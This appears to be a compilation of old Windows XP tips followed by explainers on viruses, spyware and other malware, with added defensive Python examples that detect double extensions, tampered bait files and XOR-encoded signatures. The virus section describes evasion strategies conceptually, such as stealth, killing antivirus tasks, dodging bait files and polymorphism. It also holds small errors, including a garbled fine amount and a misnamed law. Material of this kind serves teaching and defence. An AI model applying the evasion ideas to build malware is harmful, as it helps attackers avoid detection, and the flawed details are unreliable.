In the INF folder, open sysoc.inf (but not before making a BACKUP copy first). Before your eyes glaze over, look for the line containing "msmsgs" in it. Near the end of that particular line, you'll notice that the word "hide" is not so hidden. Go ahead and delete "hide" (so that the flanking commas are left sitting next to one another). Save the file and close it.
Now, open the Add and Remove Programs applet in the Control Panel. Click the Add / Remove Windows Components icon. You should see "Windows Messenger" in that list. Remove the checkmark from its box, and you should be set.
NOTE: there are other hidden system components in that sysoc.inf file, too. Remove "hide" and the subsequent programs at your own risk.

Convert FAT to NTFS file system Easily

Convert FAT to NTFS file system Easily:-
To convert a FAT partition to NTFS, perform the following steps.
Click Start>>click Programs>> and then click Command Prompt.
In Windows XP, click Start>> click Run>> type cmd or Command and then click OK.
At the command prompt,
type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

Trick to Upgrade Windows 98 or Windows Millennium Edition Profiles to Windows XP Domain User Profiles

This guide describes how to upgrade a Microsoft Windows 98-based or Microsoft Windows Millennium Edition-based client that has user profiles to a Microsoft Windows XP-based client.
The following steps enable the Windows 98 and Windows Millennium Edition (Me) profiles to be retained throughout the process. Your best method to retain the profiles is to join the domain during the upgrade installation process. Otherwise, you must use a workaround method to transfer the profile information over to the Windows XP profile.
During the upgrade installation process, at the networking section, the administrator is offered the choice to join a domain or a workgroup. If you join the domain at this juncture, you ensure that all the existing profiles are migrated successfully to the Windows XP-based installation.
If you did not join the computer to the domain during the upgrade process, you must use the following workaround method:
Join the upgraded computer to the target domain. All applicable users must log on and log off (which generates a profile). Copy the appropriate Application Data folder from the Windows 95, Windows 98, and Windows Me profiles to the newly created user profiles.

Tricks To Set The Search Screen To Classic Look

Tricks to set the search screen to Classic Look
When I first saw the default search pane in Windows XP, my instinct was to return it to its classic look; that puppy had to go. Of course, I later discovered that a doggie door is built into the applet. Click "Change preferences" then "Without an animated screen character." If you'd rather give it a bare-bones "Windows 2000" look and feel, fire up your Registry editor and navigate to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState
You may need to create a new string value labeled "Use Search Asst" and set it to "no".
That's all, you are done.

How to speed up MENU display

When using the Start menu you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.
1. Start Regedit (go to Run, type "regedit" and press Return).
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
3. Select MenuShowDelay from the list on the right.
4. Right-click on it and select Modify.
5. Change the value to 0.
6. Reboot your computer.

Run Line Command

These are GUI applications that can be opened from the run line. These applications are not located in the C:\windows\system32\ directory; the keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
1.BCKGZM.EXE - Backgammon
2.CHKRZM.EXE - Checkers
3.CONF.EXE - NetMeeting
4.DIALER.EXE - Phone Dialer
5.HELPCTR.EXE - Help and Support
6.HRTZZM.EXE - Internet Hearts
7.HYPERTRM.EXE - HyperTerminal
8.ICWCONN1.EXE - Internet Connection Wizard
9.IEXPLORE.EXE - Internet Explorer
10.INETWIZ.EXE - Setup Your Internet Connection
11.INSTALL.EXE - User's Folder
12.MIGWIZ.EXE - File and Settings Transfer Wizard
13.MOVIEMK.EXE - Windows Movie Maker
14.MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
15.MSCONFIG.EXE - System Configuration Utility
16.MSIMN.EXE - Outlook Express
17.MSINFO32.EXE - System Information
18.MSMSGS.EXE - Windows Messenger
19.MSN6.EXE - MSN Explorer
20.PBRUSH.EXE - Paint
21.PINBALL.EXE - Pinball
22.RVSEZM.EXE - Reversi
23.SHVLZM.EXE - Spades
24.TABLE30.EXE - User's Folder
25.WAB.EXE - Windows Address Book
26.WABMIG.EXE - Address Book Import Tool
27.WINNT32.EXE - User's Folder
28.WMPLAYER.EXE - Windows Media Player
29.WRITE.EXE - Wordpad
30.ACCWIZ.EXE - Accessibility Wizard
31.CALC.EXE - Calculator
32.CHARMAP.EXE - Character Map
33.CLEANMGR.EXE - Disk Space Cleanup Manager
34.CLICONFG.EXE - SQL Client Configuration
35.CLIPBRD.EXE - Clipbook Viewer
36.CLSPACK.EXE - Class Package Export Tool
37.CMD.EXE - Command Line
38.CMSTP.EXE - Connection Manager Profile Installer
39.CONTROL.EXE - Control Panel
40.DCOMCNFG.EXE - Component Services
41.DDESHARE.EXE - DDE Share
42.DRWATSON.EXE - Doctor Watson v1.00b
43.DRWTSN32.EXE - Doctor Watson Settings
44.DVDPLAY.EXE - DVD Player
45.DXDIAG.EXE - DirectX Diagnostics
46.EUDCEDIT.EXE - Private Character Editor
47.EVENTVWR.EXE - Event Viewer
48.EXPLORER.EXE - Windows Explorer
49.FREECELL.EXE - Free Cell
50.FXSCLNT.EXE - Fax Console
51.FXSCOVER.EXE - Fax Cover Page Editor
52.FXSEND.EXE - MS Fax Send Note Utility
53.IEXPRESS.EXE - IExpress 2.0
54.LOGOFF.EXE - System Logoff
55.MAGNIFY.EXE - Microsoft Magnifier
56.MMC.EXE - Microsoft Management Console
57.MOBSYNC.EXE - Microsoft Synchronization Manager
58.MPLAY32.EXE - Windows Media Player version 5.1
59.MSHEARTS.EXE - Hearts
60.MSPAINT.EXE - Paint
61.MSTSC.EXE - Remote Desktop Connection
62.NARRATOR.EXE - Microsoft Narrator
63.NETSETUP.EXE - Network Setup Wizard
64.NOTEPAD.EXE - Notepad
65.NSLOOKUP.EXE - NSLookup Application
66.NTSD.EXE - Symbolic Debugger for Windows 2000
67.ODBCAD32.EXE - ODBC Data Source Administrator
68.OSK.EXE - On Screen Keyboard
69.OSUNINST.EXE - Windows Uninstall Utility
70.PACKAGER.EXE - Object Packager
71.PERFMON.EXE - Performance Monitor
72.PROGMAN.EXE - Program Manager
73.RASPHONE.EXE - Remote Access Phonebook
74.REGEDIT.EXE - Registry Editor
75.REGEDT32.EXE - Registry Editor
76.RESET.EXE - Resets Session
77.RSTRUI.EXE - System Restore
78.RTCSHARE.EXE - RTC Application Sharing
79.SFC.EXE - System File Checker
80.SHRPUBW.EXE - Create Shared Folder
81.SHUTDOWN.EXE - System Shutdown
82.SIGVERIF.EXE - File Signature Verification
83.SNDREC32.EXE - Sound Recorder
84.SNDVOL32.EXE - Sound Volume
85.SOL.EXE - Solitaire
86.SPIDER.EXE - Spider Solitaire
87.SYNCAPP.EXE - Create A Briefcase
88.SYSEDIT.EXE - System Configuration Editor
89.SYSKEY.EXE - SAM Lock Tool
90.TASKMGR.EXE - Task Manager
91.TELNET.EXE - MS Telnet Client
92.TSSHUTDN.EXE - System Shutdown
93.TOURSTART.EXE - Windows Tour Launcher
94.UTILMAN.EXE - System Utility Manager
95.USERINIT.EXE - My Documents
96.VERIFIER.EXE - Driver Verifier Manager
97.WIAACMGR.EXE - Scanner and Camera Wizard
98.WINCHAT.EXE - Windows for Workgroups Chat
99.WINHELP.EXE - Windows Help Engine
100.WINHLP32.EXE - Help
101.WINMINE.EXE - Minesweeper
102.WINVER.EXE - Windows Version Information
103.WRITE.EXE - WordPad
104.WSCRIPT.EXE - Windows Script Host Settings
105.WUPDMGR.EXE - Windows Update
The following are Control Panel applets that can be run from the run line. They are located in the c:\windows\system32 directory, and have the file type extension ".CPL".
106.ACCESS.CPL - Accessibility Options
107.APPWIZ.CPL - Add or Remove Programs
108.DESK.CPL - Display Properties
109.HDWWIZ.CPL - Add Hardware Wizard
110.INETCPL.CPL - Internet Explorer Properties
111.INTL.CPL - Regional and Language Options
112.JOY.CPL - Game Controllers
113.MAIN.CPL - Mouse Properties
114.MMSYS.CPL - Sounds and Audio Device Properties
115.NCPA.CPL - Network Connections
116.NUSRMGR.CPL - User Accounts
117.ODBCCP32.CPL - ODBC Data Source Administrator
118.POWERCFG.CPL - Power Options Properties
119.SYSDM.CPL - System Properties
120.TELEPHON.CPL - Phone and Modem Options
121.TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from the run line. These applications have the file type extension ".MSC".
122.CERTMGR.MSC - Certificates
123.CIADV.MSC - Indexing Service
124.COMPMGMT.MSC - Computer Management
125.DEVMGMT.MSC - Device Manager
126.DFRG.MSC - Disk Defragmenter
127.DISKMGMT.MSC - Disk Management
128.EVENTVWR.MSC - Event Viewer
129.FSMGMT.MSC - Shared Folders
130.LUSRMGR.MSC - Local Users and Groups
131.NTMSMGR.MSC - Removable Storage
132.NTMSOPRQ.MSC - Removable Storage Operator Requests
133.PERFMON.MSC - Performance Monitor
134.SERVICES.MSC - Services
135.WMIMGMT.MSC - Windows Management Infrastructure
These are the commands in Windows XP Pro. Some of the commands will not work in other versions.

How Does A Virus Work

Executable Virus
As the name suggests, this virus works by infecting executable files. Executables generally include files with extensions of .vbs, .exe, .com, .sys, .dll, .bat, .reg, and others. DO NOT OPEN ANY OF THESE FILES UNLESS YOU KNOW THE PERSON AND HAVE VIRUS SCANNED THE FILE! Another area that the executable virus looks to infect is the boot sector of either a hard disk or a floppy disk.
In order for an executable virus to do any damage, it must first be loaded into the computer's memory. It accomplishes this as follows:

1. Attaches itself to an executable file, thereby infecting it.
2. Sits on that executable file, going unnoticed, while waiting for you to execute that file.
3. Once the infected file is executed, the virus is executed itself. That is, the virus is loaded into the computer's memory.
4. Once in memory, the virus program can operate, carrying out the instructions of the programmer.

An executable virus may attach to the boot sector of a hard disk or floppy disk. This boot sector virus is much more serious than other viruses since it loads automatically into memory and can begin working each time you start your computer.

Macro Virus
A macro virus is a virus that needs another computer program before it can operate. Generally, you will only find macro viruses infecting Microsoft Word and Excel. This is because these programs use a Visual Basic module for running their macros. When the virus attacks the Word or Excel document, it sits in the document and waits until you open the document with Word or Excel. Once you open the document, the macro runs, and the virus is now loaded into the computer's memory and can begin doing its work.

Macro viruses, such as the Word Macro Virus, often infect more than the document. Word has a set of templates (.dot files) that it uses. The most common file is normal.dot. A Word Macro Virus will often not only infect the document you are working on, but will try to infect Word's Normal template as well. This ensures two things:

1. Any document created within that template will be infected.
2. Any infected documents that are opened on other (non-infected) computers will infect those computers as well.

If your computer ever asks you to save changes to the Normal.dot template, say No and stop using that file!!!

Difference between Virus, Spyware, Adware


Computer Virus:-

A virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are manmade. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.
Since 1987, when a virus infected ARPANET, a large network used by the Defense Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses.
Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

Spyware:-

Any software that covertly gathers user information through the user's Internet connection without his or her knowledge, usually for advertising purposes. Spyware applications are typically bundled as a hidden component of freeware or shareware programs that can be downloaded from the Internet; however, it should be noted that the majority of shareware and freeware applications do not come with spyware. Once installed, the spyware monitors user activity on the Internet and transmits that information in the background to someone else. Spyware can also gather information about e-mail addresses and even passwords and credit card numbers.
Spyware is similar to a Trojan horse in that users unwittingly install the product when they install something else. A common way to become a victim of spyware is to download certain peer-to-peer file swapping products that are available today.

Adware:-

Any software application in which advertising banners are displayed while the program is running. The authors of these applications include additional code that delivers the ads, which can be viewed through pop-up windows or through a bar that appears on a computer screen. The justification for adware is that it helps recover programming development cost and helps to hold down the cost for the user.
Adware has been criticized because it usually includes code that tracks a user's personal information and passes it on to third parties, without the user's authorization or knowledge. This practice has been dubbed spyware and has prompted an outcry from computer security and privacy advocates, including the Electronic Privacy Information Center.

Trojan Horse:-

A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate themselves but they can be just as destructive. One of the most insidious types of Trojan horse is a program that claims to rid your computer of viruses but instead introduces viruses onto your computer.
The term comes from a Greek story of the Trojan War, in which the Greeks give a giant wooden horse to their foes, the Trojans, ostensibly as a peace offering. But after the Trojans drag the horse inside their city walls, Greek soldiers sneak out of the horse's hollow belly and open the city gates, allowing their compatriots to pour in and capture Troy.

Computer Worm:-

A computer worm is a self-replicating computer program, similar to a computer virus. A virus attaches itself to, and becomes part of, another executable program; a worm is self-contained and does not need to be part of another program to propagate itself.
The name 'worm' was taken from The Shockwave Rider, a 1970s science fiction novel by John Brunner. Researchers writing an early paper on experiments in distributed computing noted the similarities between their software and the program described by Brunner and adopted the name.
The first worm to attract wide attention, the Morris worm, was written by Robert Tappan Morris, Jr. at the MIT Artificial Intelligence Laboratory. It was released on November 2, 1988, and quickly infected a great many computers on the Internet at the time. It propagated through a number of bugs in BSD Unix and its derivatives. Morris himself was convicted under the US Computer Crime and Abuse Act and received 3 years' probation, community service and a fine in excess of ,000.
In addition to replication, a worm may be designed to do any number of things, such as delete files on a host system or send documents via email. More recent worms may be multi-headed and carry other executables as a payload. However, even in the absence of such a payload, a worm can wreak havoc just with the network traffic generated by its reproduction. Mydoom, for example, caused a noticeable worldwide Internet slowdown at the peak of its spread.
A common payload is for a worm to install a backdoor in the infected computer, as was done by Sobig and Mydoom. These backdoors are used by spam senders for sending junk email or to cloak their website's address.

Backdoor:-

A program that allows a remote user to execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers.

Dialer:-

A program that typically dials a premium rate number that has per minute charges over and above the typical call charge. These calls are made with the intent of gaining access to pornographic material.

Hijackers:-
A program that attempts to hijack certain Internet functions, like redirecting your start page to the hijacker's own start page, redirecting search queries to an undesired search engine, or replacing search results from popular search engines with their own information.

Hiding your folder in a different way!

Method:1
1) Right-click on the desktop and make a new folder.
2) Now rename the folder with a space (you have to hold the ALT key and type 0160).
3) Now you have a folder without a name.
4) Right-click on the folder > Properties > Customize. Click on Change Icon.
5) Scroll a bit and you should find some empty spaces. Click on any one of them, then click OK.
That's it, now you can store your personal data without any 3rd party tools.
Method:2
You can also hide your folder by this method: open Start > Run > CMD, then type
attrib +a +s +h "C:\name of the folder you want to hide" (path of the directory)
Now even if "Show hidden files and folders" is selected in Folder Options, the folder will still be hidden. Reason: the directory gets the attributes of a system file.
To unhide:
1. Type the same command, just put "-" instead of "+".
2. Go to Tools > Folder Options > View and uncheck "Hide protected operating system files".

Virus Infection Strategies And Their Solution

Infection strategies:-
In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus' code may be executed first. Viruses can be divided into two types, on the basis of their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are started. Instead, a resident virus loads itself into memory on execution and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself.
Nonresident viruses:-
Nonresident viruses can be thought of as consisting of a finder module and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file.
Resident viruses:-
Resident viruses contain a replication module that is similar to the one that is employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that this module is executed each time the operating system is called to perform a certain operation. For example, the replication module can be called each time the operating system executes a file. In this case, the virus infects every suitable program that is executed on the computer.
Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem to anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to spread. The disadvantage of this method is that infecting many files may make detection more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach does not seem very successful, however.

Vectors and hosts:-
Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:
1.Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux)
2.Volume Boot Records of floppy disks and hard disk partitions
3.The master boot record (MBR) of a hard disk
4.General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms).
5.Application-specific script files (such as Telix-scripts)
6.Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
7.Cross-site scripting vulnerabilities in web applications
8.Arbitrary computer files. An exploitable buffer overflow, format string, race condition or other exploitable bug in a program which reads the file could be used to trigger the execution of code hidden within it. Most bugs of this type can be made more difficult to exploit in computer architectures with protection features such as an execute disable bit and/or address space layout randomization. PDFs, like HTML, may link to malicious code.
It is worth noting that some virus authors have written an .EXE extension on the end of .PNG (for example), hoping that users would stop at the trusted file type without noticing that the computer would start with the final type of file. (Many operating systems hide the extensions of known file types by default, so for example a filename ending in ".png.exe" would be shown ending in ".png".)
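The double-extension trick described above can be checked for mechanically. The following is an added example, not part of the original post: it flags names whose real (final) extension is one of the executable types this page lists while the part shown with extensions hidden ends in a harmless-looking type. The decoy extension list and the sample file names are assumptions constructed for the illustration.

```python
import os

# Extensions this page lists as executable.
EXECUTABLE_EXTS = {".vbs", ".exe", ".com", ".sys", ".dll", ".bat", ".reg"}
# Assumption: a sample of data-file extensions a user is likely to trust.
DECOY_EXTS = {".png", ".jpg", ".gif", ".bmp", ".txt", ".doc", ".xls", ".pdf", ".mp3"}

# Constructed sample listing (not taken from a real system).
SAMPLE_LISTING = [
    "holiday.png.exe",
    r"C:\Users\demo\Downloads\Invoice.PDF.EXE",
    "readme.txt.bat",
    "setup.exe",        # honest executable: not deceptive
    "report.v2.doc",    # two dots, but the final type is a document
    "archive.tar.gz",
]


def split_name(path):
    """Return (stem, extension) of the last path component, extension lowercased."""
    base = path.replace("\\", "/").rsplit("/", 1)[-1].strip()
    stem, ext = os.path.splitext(base)
    return stem, ext.lower()


def check_name(path):
    """Return a finding dict if the name hides an executable type, else None."""
    stem, real_ext = split_name(path)
    if real_ext not in EXECUTABLE_EXTS:
        return None
    # With "hide extensions for known file types" enabled, only the stem is shown.
    decoy_ext = os.path.splitext(stem)[1].lower()
    if decoy_ext not in DECOY_EXTS:
        return None
    return {"shown_as": stem, "looks_like": decoy_ext, "runs_as": real_ext}


def scan(paths):
    """Map each deceptive path to its finding; clean names are omitted."""
    findings = {}
    for path in paths:
        finding = check_name(path)
        if finding is not None:
            findings[path] = finding
    return findings


if __name__ == "__main__":
    for path, finding in scan(SAMPLE_LISTING).items():
        print(f"{path}: shown as {finding['shown_as']!r}, runs as {finding['runs_as']}")
```
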

Methods to avoid detection:-
In order to avoid detection by users, some viruses employ different kinds of deception. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however, especially software that maintains and dates cyclic redundancy checks on file changes.
Some viruses can infect files without increasing their sizes or damaging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example the CIH virus, or Chernobyl Virus, infects Portable Executable files. Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file.
Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them.
As computers and operating systems grow larger and more complex, old hiding techniques need to be updated or replaced. Defending a computer against viruses may demand that a file system migrate towards detailed and explicit permission for every kind of file access.

Avoiding bait files and other undesirable hosts:-
A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integrity check of their own code. Infecting such programs will therefore increase the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of host that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus:
1.Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus.
2.Anti-virus professionals can use bait files to study the behavior of a virus and evaluate detection methods. This is especially useful when the virus is polymorphic. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus.
3.Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the user that a virus is probably active on the system.
Since bait files are used to detect the virus, or to make detection possible, a virus can benefit from not infecting them. Viruses typically do this by avoiding suspicious programs, such as small program files or programs that contain certain patterns of 'garbage instructions'.
A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.
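The bait-file monitoring in item 3, combined with the earlier point that keeping the "last modified" date unchanged does not fool software that stores checksums, can be sketched as follows. This is an added example, not code from the original post or from any anti-virus product: the file names, filler content and the in-place test modification are assumptions constructed for the demonstration, and real bait files would be small program files.

```python
import hashlib
import os
import tempfile
import zlib


def fingerprint(path):
    """Record what can be compared later: size, mtime, CRC-32 and SHA-256."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "size": len(data),
        "mtime_ns": os.stat(path).st_mtime_ns,
        "crc32": zlib.crc32(data),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def plant_bait(directory, count=3, size=2048):
    """Create bait files with known filler content; return {path: fingerprint}."""
    baseline = {}
    for i in range(count):
        path = os.path.join(directory, f"bait_{i:02d}.bin")  # constructed name
        with open(path, "wb") as fh:
            fh.write(bytes([0x41 + i]) * size)
        baseline[path] = fingerprint(path)
    return baseline


def naive_changed(path, old):
    """Weak check that trusts metadata only (size and last-modified time)."""
    st = os.stat(path)
    return st.st_size != old["size"] or st.st_mtime_ns != old["mtime_ns"]


def check_bait(baseline):
    """Return [(file name, reason)] for every bait file that no longer matches."""
    findings = []
    for path in sorted(baseline):
        old, name = baseline[path], os.path.basename(path)
        if not os.path.exists(path):
            findings.append((name, "missing"))
            continue
        new = fingerprint(path)
        if (new["crc32"], new["sha256"]) != (old["crc32"], old["sha256"]):
            reason = "content changed"
            if not naive_changed(path, old):
                reason += ", size and timestamp preserved"
            findings.append((name, reason))
    return findings


def simulate_modification(path, keep_metadata=True):
    """Test helper: overwrite 16 bytes in place, optionally restoring timestamps."""
    st = os.stat(path)
    with open(path, "r+b") as fh:
        fh.seek(128)
        fh.write(b"MODIFIED-BY-TEST")  # same length as the bytes it replaces
    if keep_metadata:
        os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))


def run_demo():
    """Plant bait, change one file quietly, delete another, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = plant_bait(tmp)
        clean = check_bait(baseline)
        paths = sorted(baseline)
        simulate_modification(paths[1], keep_metadata=True)
        naive = naive_changed(paths[1], baseline[paths[1]])
        os.remove(paths[2])
        return {"clean": clean, "naive_sees_change": naive,
                "findings": check_bait(baseline)}


if __name__ == "__main__":
    print(run_demo())
```

The metadata-only check reports no change for the modified file, while the checksum comparison flags it.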

Stealth:-
Some viruses try to trick anti-virus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "clean". Modern anti-virus software employs various techniques to counter stealth mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.

Self-modification:-
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. If a virus scanner finds such a pattern in a file, it notifies the user that the file is infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult but probably not impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.

Encryption with a variable key:-
A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Since these would be symmetric keys, stored on the infected host, it is in fact entirely possible to decrypt the final virus, but that probably isn't required, since self-modifying code is such a rarity that it may be reason for virus scanners to at least flag the file as suspicious.
An old, but compact, encryption involves XORing each byte in a virus with a constant, so that the exclusive-or operation had only to be repeated for decryption. It is suspicious code that modifies itself, so the code to do the encryption/decryption may be part of the signature in many virus definitions.
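From the scanner's side, the constant-XOR case described above looks like this. The block is an added example, not code from the original post: the signature, decoder stub and sample "file" are harmless constructed byte strings, and all function names are hypothetical. It shows that a plain signature scan misses the encoded body, that the constant decrypting module is still found, and two ways to match the signature under any one-byte key.

```python
# Constructed, harmless byte strings; none of them comes from real malware.
SIGNATURE = b"DEMO-SIGNATURE-0001"    # stands in for a virus signature
STUB = b"[constant-decoder-stub]"     # stands in for the decrypting module
BODY = b"body-start " + SIGNATURE + b" body-end"


def xor_bytes(data, key):
    """XOR every byte with the same one-byte key (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def make_sample(key):
    """Constructed test file: host bytes, constant stub, body XORed with `key`."""
    return b"HOSTFILE" * 4 + STUB + xor_bytes(BODY, key)


def plain_scan(data, pattern=SIGNATURE):
    """Classic signature scan: offset of the pattern, or -1 if absent."""
    return data.find(pattern)


def brute_force_scan(data, pattern=SIGNATURE):
    """Try all 256 one-byte keys. Returns (key, offset) or None."""
    for key in range(256):
        offset = data.find(xor_bytes(pattern, key))
        if offset != -1:
            return key, offset
    return None


def delta(data):
    """XOR each byte with its successor. A constant key cancels out,
    because (a ^ k) ^ (b ^ k) == a ^ b."""
    return bytes(a ^ b for a, b in zip(data, data[1:]))


def key_independent_scan(data, pattern=SIGNATURE):
    """Single pass that matches the pattern under any constant one-byte key.
    Returns (key, offset) or None."""
    offset = delta(data).find(delta(pattern))
    if offset == -1:
        return None
    # The key falls out of the first matched byte.
    return data[offset] ^ pattern[0], offset


def scan_report(data):
    """Run every check on one buffer and collect the results."""
    return {
        "plain_signature": plain_scan(data),
        "decoder_stub": plain_scan(data, STUB),
        "brute_force": brute_force_scan(data),
        "key_independent": key_independent_scan(data),
    }


if __name__ == "__main__":
    for key in (0x00, 0x5A, 0xC3):
        print(hex(key), scan_report(make_sample(key)))
```
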
Polymorphic code:-
Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses however, this decryption module is also modified on each infection. A well-written polymorphic virus therefore has no parts which remain identical between infections, making it very difficult to detect directly using signatures. Anti-virus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body.
Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.
Metamorphic code:-
To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly language code, 90% of which is part of the metamorphic engine.
Vulnerability and countermeasures
The vulnerability of operating systems to viruses
Just as genetic diversity in a population decreases the chance of a single disease wiping out a population, the diversity of software systems on a network similarly limits the destructive potential of viruses.
This became a particular concern in the 1990s, when Microsoft gained market dominance in desktop operating systems and office suites. The users of Microsoft software (especially networking software such as Microsoft Outlook and Internet Explorer) are especially vulnerable to the spread of viruses. Microsoft software is targeted by virus writers due to their desktop dominance, and is often criticized for including many errors and holes for virus writers to exploit. Integrated applications (such as Microsoft Office) and applications with scripting languages with access to the file system (for example Visual Basic Script (VBS), and applications with networking features) are also particularly vulnerable.
Although Windows is by far the most popular operating system for virus writers, some viruses also exist on other platforms. Any operating system that allows third-party programs to run can theoretically run viruses. Some operating systems are less secure than others. Unix-based OS's (and NTFS-aware applications on Windows NT based platforms) only allow their users to run executables within their protected space in their own directories.
Internet-based research revealed that there were cases when people willingly pressed a particular button to download a virus. The security firm F-Secure ran a half-year advertising campaign on Google AdWords which said "Is your PC virus-free? Get it infected here!". The result was 409 clicks.
As of 2006, there are relatively few security exploits targeting Mac OS X (with a Unix-based file system and kernel). The number of viruses for the older Apple operating systems, known as Mac OS Classic, varies greatly from source to source, with Apple stating that there are only four known viruses, and independent sources stating there are as many as 63 viruses. It is safe to say that Macs are less likely to be targeted because of low market share and thus a Mac-specific virus could only infect a small proportion of computers (making the effort less desirable). Virus vulnerability between Macs and Windows is a chief selling point, one that Apple uses in their Get a Mac advertising. That said, Macs have also had security issues just as Microsoft Windows has, though none have ever been fully taken advantage of successfully in the wild.
